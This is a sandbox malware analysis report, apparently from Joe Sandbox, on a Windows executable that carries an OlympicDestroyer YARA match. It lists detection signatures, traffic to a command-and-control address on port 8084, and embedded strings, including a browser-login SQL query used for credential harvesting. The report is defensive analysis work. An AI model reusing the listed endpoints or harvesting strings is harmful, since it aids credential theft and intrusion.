Edit tour

Windows Analysis Report
O16AWEA5iQ.exe

Overview

General Information

Sample name:	O16AWEA5iQ.exe renamed because original name is a hash value
Original sample name:	e704ea2f17b1c9b22182eb203c757ba91e262983d7021f4c644b99cd98f0b0ce.exe
Analysis ID:	1577436
MD5:	54a911b3e8161444ea6677c23aa38d17
SHA1:	7c9776b4517cc6c45a3f2f98ba53b3859724eae6
SHA256:	e704ea2f17b1c9b22182eb203c757ba91e262983d7021f4c644b99cd98f0b0ce
Tags:	107-148-62-100exeuser-JAMESWT_MHT
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

AI detected suspicious sample

Potentially malicious time measurement code found

Tries to harvest and steal browser information (history, passwords, etc)

Uses known network protocols on non-standard ports

Abnormal high CPU Usage

Contains functionality for execution timing, often used to detect debuggers

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a raw input device (often for capturing keystrokes)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

O16AWEA5iQ.exe (PID: 1096 cmdline: "C:\Users\user\Desktop\O16AWEA5iQ.exe" MD5: 54A911B3E8161444EA6677C23AA38D17)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
O16AWEA5iQ.exe	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x4f633d:$string1: SELECT origin_url, username_value, password_value FROM logins 0x74f5c8:$string2: API call with %s database connection pointer 0x74f9c8:$string3: os_win.c:%d: (%lu) %s(%s) - %s

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.O16AWEA5iQ.exe.7ff7000d0000.0.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x4f633d:$string1: SELECT origin_url, username_value, password_value FROM logins 0x74f5c8:$string2: API call with %s database connection pointer 0x74f9c8:$string3: os_win.c:%d: (%lu) %s(%s) - %s
0.2.O16AWEA5iQ.exe.7ff7000d0000.3.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x4f633d:$string1: SELECT origin_url, username_value, password_value FROM logins 0x74f5c8:$string2: API call with %s database connection pointer 0x74f9c8:$string3: os_win.c:%d: (%lu) %s(%s) - %s

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:31:48.133803+0100	2803305	3	Unknown Traffic	192.168.2.5	49705	107.148.62.100	8084	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 83.0% probability

Source: O16AWEA5iQ.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: +Inf-Inf...:.3dm.INF.Inf.NAN.NaN.aab.aam.aas.abc.ace.afl.aif.aim.aip.alz.ani.aos.apk.aps.arc.arj.art.asf.asm.asp.asx.avi.avs.bat.bin.bmp.boo.boz.bsh.bz2.c++.cab.cat.cco.cdf.cer.cha.cmd.com.cpp.cpt.crl.crt.crx.csh.css.csv.cxx.dar.dcr.deb.def.der.dif.dir.dmg.doc.dot.drw.dvi.dwf.dwg.dxf.dxr.elc.eml.env.eps.etx.evy.exe.f77.f90.fdf.fif.fli.flo.flv.flw.flx.fmf.for.fpx.frl.gif.gsd.gsm.gsp.gss.hdf.hgl.hlb.hlp.hpg.hqx.hta.htc.htm.htt.htx.ice.ico.ics.icz.idc.ief.igs.ima.inf.ins.isu.ivr.ivy.jam.jav.jcm.jpe.jpg.jps.jut.kar.key.kfo.kml.kmz.kon.kpr.kpt.ksh.ksp.kth.kwd.kwt.lam.lha.lhx.lma.log.lsp.lst.lsx.ltx.lzh.lzx.m1v.m2a.m2v.m3u.man.map.mar.mbd.mc$.mcd.mcf.mcp.mht.mid.mif.mjf.mjs.mme.mod.mov.mp2.mp3.mp4.mpa.mpc.mpe.mpg.mpp.mpt.mpv.mpx.mrc.mzz.nan.nap.ncm.nif.nix.nsc.nvd.oda.odb.odc.odf.odg.odi.odm.odp.ods.odt.oex.oga.ogg.ogv.omc.otc.otf.otg.oth.oti.otm.otp.ots.ott.p10.p12.p7a.p7c.p7m.p7r.p7s.pas.pbm.pcl.pct.pcx.pdb.pdf.pgm.pic.pkg.pko.plx.pm4.pm5.png.pnm.pot.pov.ppa.ppm.pps.ppt.ppz.pre.prt.psd.pvu.pwz.pyc.qcp.qd3.qif.qtc.qti.ram.rar.ras.rgb.rmi.rmm.rmp.rng.rnx.rpm.rtf.rtx.s3m.s7z.sbk.scm.sdp.sdr.sea.set.sgm.sid.sit.skd.skm.skp.skt.smi.snd.sol.spc.spl.spr.spx.src.ssi.ssm.sst.stl.stp.svf.svg.svr.swf.tar.tbk.tcl.tex.tgz.tif.tsi.tsp.tsv.txt.uil.uni.unv.uri.uue.vcd.vcf.vcs.vda.vdo.vew.viv.vmd.vmf.voc.vos.vox.vqe.vqf.vql.vrt.vsd.vst.vsw.w60.w61.w6w.wav.wb1.web.wiz.wk1.wmf.wml.wp5.wp6.wpd.wq1.wri.wrl.wrz.wsc.wtk.xbm.xdr.xgz.xif.xla.xlb.xlc.xld.xlk.xll.xlm.xls.xlt.xlv.xlw.xml.xmz.xpi.xpm.xsr.xwd.xyz.zip.zoo.zsh/qps044006600x%x10801;311;321;331;341;351;361;371;4420063125:443:ext<!--<%s>ACDTACSTAEDTAESTAKDTAKSTAMP;AUTHAWSTAcy;Afr;AhomAnd;ArgsAtoiAumlBcy;BetaBfr;CESTCHARCOPYCallCap;Cfr;ChamChi;Cup;DATADashDataDateDcy;Del;Dfr;Dot;EESTENG;ETH;Ecy;Efr;Eta;EtagEumlFcy;Ffr;FromGET GOGCGcy;Gfr;GoneGrayHEADHat;Hfr;HostIDATIENDIHDRIMAGIcy;IdleIfr;InitInt;IotaIumlJcy;Jfr;JulyJuneKcy;Kfr;LEAFLOCKLcy;Lfr;LisuLsh;MOVEMap;Mcy;Mfr;MiaoModiNOOPNULLNZDTNZSTNameNcy;NewaNfr;Not;NullOcy;Ofr;OpenOumlPINGPLTEPOSTPcy;Pfr;Phi;Psi;QUITQUOTQfr;REG;RGBARSETRcy;ReadRfr;Rho;Rsh;SASTScy;Sfr;SkipStatSub;Sum;Sup;TRUETab;Tau;Tcy;Tfr;ThaiTo: TrueTypeUcy;Ufr;UumlVcy;Vee;Vfr;Wfr;Xfr;Ycy;Yfr;YumlZcy;ZetaZfr;[FL][FN][IN][LN][]%s"`'/\/[]\u00 source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rprichard\proj\winpty\src\Release\x64\winpty.pdb source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rprichard\proj\winpty\src\Release\x64\winpty-agent.pdb source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 4x nop then mov rsi, r9		0_2_000002EBF9BB8000
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 4x nop then mov rdi, 0000800000000000h		0_2_000002EBF9BB7260

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 8084
Source: unknown	Network traffic detected: HTTP traffic on port 8084 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 8084
Source: unknown	Network traffic detected: HTTP traffic on port 8084 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 8084
Source: unknown	Network traffic detected: HTTP traffic on port 8084 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 8084
Source: unknown	Network traffic detected: HTTP traffic on port 8084 -> 49930

Source: global traffic

TCP traffic: 192.168.2.5:49705 -> 107.148.62.100:8084

Source: global traffic	HTTP traffic detected: GET /?a=w64&h=107.148.62.100&t=ws_&p=8084 HTTP/1.1Host: 107.148.62.100:8084Data Raw: 00 00 00 00 00 00 00 26 9a 86 c8 f8 7f 00 00 00 00 0d 00 f7 7f 00 00 02 00 00 00 f8 7f 00 00 00 00 00 00 00 00 00 00 af f2 fe c5 f8 7f 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 45 45 8a c8 f8 7f 00 00 00 80 97 ed fb 00 00 00 02 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 30 33 4d 00 f7 7f 00 00 80 26 80 d2 eb 02 00 00 ff 9a 86 c8 f8 7f 00 00 48 a0 8a 00 f7 7f 00 00 00 00 0d 00 f7 7f 00 00 02 00 00 00 f8 7f 00 00 80 26 80 d2 eb 02 00 00 00 00 00 00 00 00 00 00 85 03 fe 7f 00 00 00 00 15 00 00 00 00 00 00 00 d3 e6 88 c8 f8 7f 00 00 00 12 67 c5 f8 7f 00 00 b4 d9 8a c8 f8 7f 00 00 00 00 00 00 00 00 00 00 00 50 96 ed fb 00 00 00 00 00 00 00 00 00 00 00 6f df 87 c8 f8 7f 00 00 00 12 67 c5 f8 7f 00 00 55 79 86 c8 f8 7f 00 00 00 00 80 d2 eb 02 00 00 a8 94 82 d2 eb 02 00 00 00 50 96 ed fb 00 00 00 00 12 67 c5 f8 7f 00 00 00 4f 82 d2 eb 02 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 94 82 d2 eb 02 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 a0 94 82 d2 eb 02 00 00 4b 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 52 00 00 00 f8 7f 00 00 50 01 80 d2 eb 02 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 a0 94 82 d2 eb 02 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 1d 79 86 c8 f8 7f 00 00 3d 79 86 c8 f8 7f 00 00 3a 00 00 00 00 00 00 00 b0 5a 83 d2 eb 02 00 00 11 00 00 00 00 00 00 00 28 03 80 d2 eb 02 00 00 50 01 80 d2 eb 02 00 00 01 00 00 00 00 00 00 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 03 80 d2 eb 02 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b b9 87 c8 f8 7f 00 00 19 00 11 00 00 00 00 00 a0 03 00 00 00 00 00 00 e0 0d 83 d2 eb 02 00 00 00 00 00 00 00 00 00 00 52 00 00 52 f8 7f 00 00 f4 a7 80 d2 eb 02 00 00 00 00 00 00 00 00 00 00 7d 05 00 78 eb 02 00 00 00 00 00 00 00 00 00 00 02 00 00 02 eb 02 00 00 c4 02 aa d2 eb 02 00 00 68 4b 8c c8 f8 7f 00 00 90 00 00 00 00 00 00 00 52 00 00 52 eb 02 00 00 00 00 00 00 00 00 00 00 7d 05 00 78 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 02 00 00 00 00 88 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 80 d2 eb 02 00 00 c9 f5 df ee fb 00 00 00 08 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 00 00 00 00 00 90 03 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 80 d2 eb 02 00 00 3a 00 00 00 00 00 00 00 4d b4 87 c8 f8 7f 00 00 00 00 80 d2 eb 02 00 00 0a 00 30 00 00 00 00 00 90 03 00 00 00 00 00 00 64 43 8a c8 f8 7f 00 00 00 05 80 d2 eb 02 00 00 84 f5 df ee fb 00 00 00 00 00 00 00 03 00 00 00 ee 44 8a c8 f8 7f 00 00 20 2b 8a c8 f8 7f 00 00 50 0b 80 d2 eb 02 00 00 90 53 83 d2 eb 02 00 00 a6 ff 86 c8 f8 7f 00 00 90 53 83 d2 eb 02 00 00 bd 9b 5b f7 26 09 00 00 Data Ascii: &
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 107.148.62.100:8084Upgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: T8vpWyVC/nn0nHpR3Si6Ig==
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 107.148.62.100:8084Upgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: U17qSsg+npRZjK2b4g0Mgg==
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 107.148.62.100:8084Upgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: QNQljnb+r4w3/s2WDeO8GA==

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 107.148.62.100:8084

Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100
Source: unknown	TCP traffic detected without corresponding DNS query: 107.148.62.100

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe

Code function: 0_2_000002EBD2AD0000 LoadLibraryA,WSASocketA,gethostbyname,connect,send,VirtualAlloc,recv,VirtualAlloc,recv,

0_2_000002EBD2AD0000

Source: global traffic	HTTP traffic detected: GET /wmob HTTP/1.1Host: www.61xdm.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /?a=w64&h=107.148.62.100&t=ws_&p=8084 HTTP/1.1Host: 107.148.62.100:8084Data Raw: 00 00 00 00 00 00 00 26 9a 86 c8 f8 7f 00 00 00 00 0d 00 f7 7f 00 00 02 00 00 00 f8 7f 00 00 00 00 00 00 00 00 00 00 af f2 fe c5 f8 7f 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 45 45 8a c8 f8 7f 00 00 00 80 97 ed fb 00 00 00 02 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 30 33 4d 00 f7 7f 00 00 80 26 80 d2 eb 02 00 00 ff 9a 86 c8 f8 7f 00 00 48 a0 8a 00 f7 7f 00 00 00 00 0d 00 f7 7f 00 00 02 00 00 00 f8 7f 00 00 80 26 80 d2 eb 02 00 00 00 00 00 00 00 00 00 00 85 03 fe 7f 00 00 00 00 15 00 00 00 00 00 00 00 d3 e6 88 c8 f8 7f 00 00 00 12 67 c5 f8 7f 00 00 b4 d9 8a c8 f8 7f 00 00 00 00 00 00 00 00 00 00 00 50 96 ed fb 00 00 00 00 00 00 00 00 00 00 00 6f df 87 c8 f8 7f 00 00 00 12 67 c5 f8 7f 00 00 55 79 86 c8 f8 7f 00 00 00 00 80 d2 eb 02 00 00 a8 94 82 d2 eb 02 00 00 00 50 96 ed fb 00 00 00 00 12 67 c5 f8 7f 00 00 00 4f 82 d2 eb 02 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 94 82 d2 eb 02 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 a0 94 82 d2 eb 02 00 00 4b 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 52 00 00 00 f8 7f 00 00 50 01 80 d2 eb 02 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 a0 94 82 d2 eb 02 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 1d 79 86 c8 f8 7f 00 00 3d 79 86 c8 f8 7f 00 00 3a 00 00 00 00 00 00 00 b0 5a 83 d2 eb 02 00 00 11 00 00 00 00 00 00 00 28 03 80 d2 eb 02 00 00 50 01 80 d2 eb 02 00 00 01 00 00 00 00 00 00 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 03 80 d2 eb 02 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b b9 87 c8 f8 7f 00 00 19 00 11 00 00 00 00 00 a0 03 00 00 00 00 00 00 e0 0d 83 d2 eb 02 00 00 00 00 00 00 00 00 00 00 52 00 00 52 f8 7f 00 00 f4 a7 80 d2 eb 02 00 00 00 00 00 00 00 00 00 00 7d 05 00 78 eb 02 00 00 00 00 00 00 00 00 00 00 02 00 00 02 eb 02 00 00 c4 02 aa d2 eb 02 00 00 68 4b 8c c8 f8 7f 00 00 90 00 00 00 00 00 00 00 52 00 00 52 eb 02 00 00 00 00 00 00 00 00 00 00 7d 05 00 78 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 02 00 00 00 00 88 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 80 d2 eb 02 00 00 c9 f5 df ee fb 00 00 00 08 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 00 00 00 00 00 90 03 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 80 d2 eb 02 00 00 3a 00 00 00 00 00 00 00 4d b4 87 c8 f8 7f 00 00 00 00 80 d2 eb 02 00 00 0a 00 30 00 00 00 00 00 90 03 00 00 00 00 00 00 64 43 8a c8 f8 7f 00 00 00 05 80 d2 eb 02 00 00 84 f5 df ee fb 00 00 00 00 00 00 00 03 00 00 00 ee 44 8a c8 f8 7f 00 00 20 2b 8a c8 f8 7f 00 00 50 0b 80 d2 eb 02 00 00 90 53 83 d2 eb 02 00 00 a6 ff 86 c8 f8 7f 00 00 90 53 83 d2 eb 02 00 00 bd 9b 5b f7 26 09 00 00 Data Ascii: &
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 107.148.62.100:8084Upgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: T8vpWyVC/nn0nHpR3Si6Ig==
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 107.148.62.100:8084Upgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: U17qSsg+npRZjK2b4g0Mgg==
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 107.148.62.100:8084Upgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: QNQljnb+r4w3/s2WDeO8GA==

Source: global traffic

DNS traffic detected: DNS query: www.61xdm.com

Source: O16AWEA5iQ.exe, 00000000.00000002.4569856934.000001C000104000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://beego.me/docs/advantage/monitor.md
Source: O16AWEA5iQ.exe, 00000000.00000002.4569856934.000001C000104000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://beego.me/docs/module/toolbox.md
Source: O16AWEA5iQ.exe	String found in binary or memory: https://www.61xdm.com/wmobbad
Source: O16AWEA5iQ.exe	String found in binary or memory: https://www.i5iii.com/insertGetSecurityDescriptorControlInitializeSecurityDescriptorSetSecurityDescr

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: O16AWEA5iQ.exe, 00000000.00000002.4569856934.000001C0001F2000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

memstr_d03ae5bc-9

System Summary

Malicious sample detected (through community Yara rule)

Source: O16AWEA5iQ.exe, type: SAMPLE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.0.O16AWEA5iQ.exe.7ff7000d0000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.O16AWEA5iQ.exe.7ff7000d0000.3.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BD9EC0	0_2_000002EBF9BD9EC0
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9B9BEC0	0_2_000002EBF9B9BEC0
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BC7EA0	0_2_000002EBF9BC7EA0
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BDB700	0_2_000002EBF9BDB700
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BB76E0	0_2_000002EBF9BB76E0
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9B96E40	0_2_000002EBF9B96E40
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BAF660	0_2_000002EBF9BAF660
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BD7600	0_2_000002EBF9BD7600
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BB3E00	0_2_000002EBF9BB3E00
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BABDE0	0_2_000002EBF9BABDE0
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9B96980	0_2_000002EBF9B96980
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BD2960	0_2_000002EBF9BD2960
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BA90C0	0_2_000002EBF9BA90C0
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BDA0A0	0_2_000002EBF9BDA0A0
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9B960A0	0_2_000002EBF9B960A0
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9B9C880	0_2_000002EBF9B9C880
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BA3FA0	0_2_000002EBF9BA3FA0
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BB8000	0_2_000002EBF9BB8000
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BB4AC0	0_2_000002EBF9BB4AC0
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BC5280	0_2_000002EBF9BC5280
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9B99A60	0_2_000002EBF9B99A60
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BB9260	0_2_000002EBF9BB9260
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BB7260	0_2_000002EBF9BB7260
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9B9D440	0_2_000002EBF9B9D440
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BC2420	0_2_000002EBF9BC2420
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BA4C80	0_2_000002EBF9BA4C80
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBF9BAE3A0	0_2_000002EBF9BAE3A0
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: 0_2_000002EBD2AD0000	0_2_000002EBD2AD0000

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: String function: 000002EBF9BDA940 appears 37 times
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Code function: String function: 000002EBF9BC4A80 appears 321 times

Source: O16AWEA5iQ.exe

Static PE information: Number of sections : 24 > 10

Source: O16AWEA5iQ.exe, type: SAMPLE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.0.O16AWEA5iQ.exe.7ff7000d0000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.O16AWEA5iQ.exe.7ff7000d0000.3.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload

Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: json:"sendTos""func() (I8Kqpce.vbPLyOAN, error)"func() (mefzXSB.I8gBmvB7, error)"func() (ymqHIoV.ECO27RML, error)"func() (float32, big.BGNVUx_DNVL)"func() (float64, big.BGNVUx_DNVL)"func() A6izPOWx3cnT.XUJzxOFrdhZb"func(BznvhSN1G9y6.AMey1oqZ) bool"func(interface {}) interface {}"func(ymqHIoV.IQq_9Sw_hHXE) error"func(NUwZuKt4jok.DYfjsDDq7) error"func([]interface {}, bool, error)"func([]uint8, int32) (int, error)"func([]uint8, int64) (int, error)"func([]uint8, interface {}) error"func([]uint8, uint8, int) []uint8"func(doGVc_R_.FMDoyrjOMH_m) error"func(eyEgTlNX.cXJFWX08w4HT) error"func(int, int, int) reflect.Value"func(int, uintptr) unsafe.Pointer"func(interface {}, bool, ...bool)"func(mzj3P7mSob.H3jgSKF_SR) error"func(reflect.Value) reflect.Value"func(string, string) (int, error)"func(uint32, bool, []uint8) error"func(unsafe.Pointer) interface {}"func(zqjZ9leu.Q1JkS0i, int) error"interface { SetEscapeHTML(bool) }"kOIlhn28.decFunc[go.shape.uint8]"map.bucket[int]Dz9M0q.OAw2dtyiq31"map.bucket[interface {}][]uintptr"map.bucket[interface {}]struct 